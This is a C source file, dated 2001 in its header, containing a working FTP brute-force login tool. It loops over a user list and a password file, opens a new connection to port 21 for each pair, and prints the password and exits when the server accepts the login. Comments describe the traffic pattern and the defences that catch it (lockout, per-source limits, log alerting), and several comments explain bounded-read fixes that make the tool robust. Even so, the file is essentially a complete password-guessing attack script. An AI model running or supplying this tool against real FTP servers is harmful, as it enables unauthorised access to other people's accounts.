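/*
 * ===== simple ftp scanner =====
 * written by MoD and ZehDeh 2001
 * === example of a simple ftp scanner in c ===
 *
 * Usage: prog [host] [userlist] [passwordfile]
 *
 * For every name in the user list, every entry of the password file is
 * tried in turn. Each attempt opens a new TCP connection to port 21 of the
 * host, reads the greeting, sends USER and PASS, and treats a reply that
 * starts with "230" as a successful login.
 *
 * Seen from the server, this is one short-lived connection per attempt, all
 * from the same source address, each carrying a single USER/PASS pair in
 * clear text and closed right after the reply. Per-source limits on failed
 * logins, account lockout and alerting on bursts of failed logins in the
 * FTP log all address this pattern.
 *
 * Every byte read from the socket is chosen by the remote server, so all
 * reads below are bounded to leave room for the terminating NUL.
 */

/*
 * The header names were lost when this listing was extracted (the original
 * shows seven bare #include directives). The set below is the one the calls
 * in this file require.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void logintoftp(void);

char tmp[256];
char name[300], pass[300], buf[300], buf2[300]; /* current candidate + raw list lines */
char snd[1024], rcv[1024];                      /* command / reply scratch buffers */
int n;                                          /* byte count of the last read() */
int sockfd;                                     /* connection used by logintoftp() */

/*
 * Entry point: argv[1] is an IPv4 address in dotted form, argv[2] the user
 * list, argv[3] the password list (one whitespace-free token per line).
 *
 * Exits with EXIT_FAILURE on usage, file, address or socket errors; exits
 * with 0 from logintoftp() on the first accepted login; returns 0 when both
 * lists are exhausted.
 */
int main(int argc, char **argv)
{
    char recvln[4048];
    ssize_t len;
    struct sockaddr_in cli;
    FILE *passwd, *userlist;

    if (argc < 4) {
        printf("usage: %s [host] [userlist] [passwordfile]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* The lists are only read, so open them read-only instead of "r+". */
    passwd = fopen(argv[3], "r");
    if (!passwd) {
        printf("Cannot open %s\n\n", argv[3]);
        exit(EXIT_FAILURE);
    }
    fclose(passwd);

    userlist = fopen(argv[2], "r");
    if (!userlist) {
        printf("Cannot open %s\n\n", argv[2]);
        exit(EXIT_FAILURE);
    }

    /*
     * Parse the target once. An unchecked inet_pton() failure would leave
     * sin_addr zeroed and the program would connect to the wrong address.
     */
    memset(&cli, 0, sizeof cli);
    cli.sin_family = AF_INET;
    cli.sin_port = htons(21);
    if (inet_pton(AF_INET, argv[1], &cli.sin_addr) != 1) {
        fprintf(stderr, "invalid IPv4 address: %s\n", argv[1]);
        fclose(userlist);
        exit(EXIT_FAILURE);
    }

    /*
     * Loop on fgets() itself: testing feof() before reading processes the
     * last line twice and reuses stale buffer contents on an empty file.
     */
    while (fgets(buf, sizeof buf, userlist) != NULL) {
        /* Width-limited %s; a blank line must not reuse the previous name. */
        if (sscanf(buf, "%299s", name) != 1)
            continue;

        passwd = fopen(argv[3], "r");
        if (!passwd) {
            printf("Cannot open %s\n\n", argv[3]);
            fclose(userlist);
            exit(EXIT_FAILURE);
        }

        while (fgets(buf2, sizeof buf2, passwd) != NULL) {
            if (sscanf(buf2, "%299s", pass) != 1)
                continue;
            printf("%s\n", pass);

            if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                perror("socket");
                exit(EXIT_FAILURE);
            }
            if (connect(sockfd, (struct sockaddr *)&cli, sizeof cli) < 0) {
                perror("connect");
                close(sockfd);
                exit(EXIT_FAILURE);
            }

            /*
             * Read the greeting up to the first newline. One byte is kept
             * back so recvln[len] stays inside the buffer even when the
             * server fills it completely.
             */
            memset(recvln, 0, sizeof recvln);
            while ((len = read(sockfd, recvln, sizeof recvln - 1)) > 0) {
                recvln[len] = '\0';
                if (strchr(recvln, '\n') != NULL)
                    break;
            }

            logintoftp();
            close(sockfd);
        }
        fclose(passwd);
        printf("nothing found ohhh :-(\n\n");
    }
    fclose(userlist);
    return 0;
}

/*
 * Sends USER <name> and PASS <pass> on the already-connected global sockfd
 * and reads one reply (up to the first newline) after each command.
 *
 * name and pass are produced by sscanf("%s"), which stops at whitespace, so
 * they cannot carry CR/LF into the command stream.
 *
 * Does not return if the reply to PASS starts with "230": it prints the
 * password and exits the process with status 0. Otherwise returns to the
 * caller, which closes the socket.
 */
void logintoftp(void)
{
    printf("logging in with %s: %s\n", name, pass);

    snprintf(snd, sizeof snd, "USER %s\r\n", name);
    if (write(sockfd, snd, strlen(snd)) < 0) {
        perror("write");
        return;
    }
    /* sizeof rcv - 1: rcv[n] = 0 must not land one past the buffer. */
    while ((n = read(sockfd, rcv, sizeof rcv - 1)) > 0) {
        rcv[n] = 0;
        if (strchr(rcv, '\n') != NULL)
            break;
    }

    snprintf(snd, sizeof snd, "PASS %s\r\n", pass);
    if (write(sockfd, snd, strlen(snd)) < 0) {
        perror("write");
        return;
    }
    while ((n = read(sockfd, rcv, sizeof rcv - 1)) > 0) {
        rcv[n] = 0;
        /*
         * Only inspect the reply code when three bytes actually arrived;
         * otherwise leftovers of the previous reply would be compared.
         */
        if (n >= 3 && memcmp(rcv, "230", 3) == 0) {
            printf("Drin ...\nPassword: %s\n\n", pass);
            exit(0);
        }
        if (strchr(rcv, '\n') != NULL)
            break;
    }
}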